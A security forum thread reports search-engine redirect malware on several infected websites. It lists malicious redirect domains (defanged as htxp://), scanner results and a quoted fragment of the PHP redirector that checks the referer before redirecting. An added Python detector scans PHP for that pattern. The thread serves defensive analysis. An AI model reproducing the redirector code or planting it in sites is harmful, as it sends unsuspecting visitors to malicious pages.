SE visitor redirect detected?

See: http://killmalware.com/creoquealgoestapasando.com/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://cooptraiss.com/hezd.html?h=989550
95 sites infected with redirects to this URL
https://www.virustotal.com/nl/file/5a96ae11555504787da4b5f09ca3175a006392cff7c2c7df1a57f08ca2ebda02/analysis/ &
https://www.virustotal.com/nl/url/eeddf36ddf40e395ac70e5a5ffa404acc93024adbd920591b7a756b7147ad0ac/analysis/
http://sitecheck.sucuri.net/results/cooptraiss.com/

polonus

SE visitor redirect campaigns may be short-lived (a couple of hours) or may stay up and active for longer until they are finally taken down or go dead.
On for a couple of days is http://killmalware.com/g-010.com/# → SE visitors redirects
Visitors from search engines are redirected
to: htxp://korawi.4pu.com/
1016 sites infected with redirects to this URL
See: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.g-010.com%2F%2Findex.php&useragent=Fetch+useragent&accept_encoding=
PHP attack → tristr($referer,“facebook.com”) or stristr($referer,“aol dot com”)) { if (!stristr($referer,“cache”) or !stristr($referer,“inurl”)){ header(“Location: htxp://korawi.4pu.com/”); …PHP 5.2.17p1 40%
see: http://www.urlvoid.com/scan/korawi.4pu.com/
See the redirecting site is not being blocked at the moment,
also see: http://sitecheck.sucuri.net/results/www.g-010.com/
which flags the malware as:
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
Location: htxp://korawi.4pu.com/ where avast! Web Shield should have detected PHP:Redirector-AF[Trj]

polonus
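
Added example, not part of the original posts and not code from any of the scanners linked above: a small Python heuristic that flags PHP source combining a referer string test with a Location header to a foreign host, the pattern in the fragment quoted in the post above. The name scan_php, the own_hosts parameter and both sample files are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit

# String-match calls PHP redirectors commonly use to test the referer.
CALL = re.compile(r"\b(?:stristr|stripos|strpos|strstr|preg_match)\s*\(([^()]*)\)", re.I)
# A referer variable: $_SERVER['HTTP_REFERER'] or any $...refer... name.
REFVAR = re.compile(r"\$(?:_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]|\w*refer\w*)", re.I)
LITERAL = re.compile(r"['\"]([^'\"]+)['\"]")
LOCATION = re.compile(r"header\s*\(\s*['\"]Location:\s*(https?://[^'\"\s]+)", re.I)

def scan_php(source, own_hosts=()):
    """Return Location redirects to foreign hosts in files that also test the referer."""
    tokens = set()
    for call in CALL.finditer(source):
        args = call.group(1)
        if REFVAR.search(args):
            # Drop the variable first so 'HTTP_REFERER' is not read as a token.
            tokens.update(LITERAL.findall(REFVAR.sub("", args)))
    findings = []
    for loc in LOCATION.finditer(source):
        host = urlsplit(loc.group(1)).hostname or ""
        local = any(host == h or host.endswith("." + h) for h in own_hosts)
        if tokens and not local:
            findings.append({
                "line": source.count("\n", 0, loc.start()) + 1,
                "target": loc.group(1),
                "referer_tokens": sorted(tokens),
            })
    return findings

# Constructed samples: an infected file shaped like the quoted fragment, and a
# normal login redirect that must not be flagged.
INFECTED = '''<?php
$referer = $_SERVER['HTTP_REFERER'];
if (stristr($referer, "search.example") or stristr($referer, "facebook.com")) {
    if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
        header("Location: http://redirect-target.example.invalid/");
        exit();
    }
}
?>'''
CLEAN = '''<?php
if (!isset($_SESSION["user"])) {
    header("Location: https://www.site.example/login.php");
}
?>'''

if __name__ == "__main__":
    for finding in scan_php(INFECTED, own_hosts=("site.example",)):
        print(finding)
```

A hit is a lead for manual review of the file, since legitimate code can also branch on the referer before redirecting.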

What about this one? http://killmalware.com/savvyvisions.com/#
SE visitors redirects
Visitors from search engines are redirected
to: htxp://rnd.jkub.com/ → http://labs.sucuri.net/?details=rnd.jkub.com
& http://www.urlvoid.com/scan/rnd.jkub.com (some give nd.jkub dot com as currently safe)
1595 sites infected with redirects to this URL

pol

Three scanners do not detect: http://urlquery.net/report.php?id=1403999288431
and http://zulu.zscaler.com/submission/show/20a30cb46b768a7af25aa2f073a2d34b-1403999238
and http://www.quttera.com/detailed_report/agroforestryinc.com
SE visitors redirects
Chain of redirects found:
to: htxp://tinyurl.com/bnrs6vp
1351 sites infected with redirects to this URL
to: htxp://www.mangacompass.altervista.org/libraries/pear/tard/www/all2.php
6987 sites infected with redirects to this URL
Being confirmed here: http://sitecheck.sucuri.net/results/agroforestryinc.com

pol

P.S. Joomla is involved. The folks at that website may have missed the info on our forums on April 9 last, ;D,
so they are confronted with the same or a reinfection two months later.
Read an earlier posting of mine on this here: https://forum.avast.com/index.php?topic=148758.0

D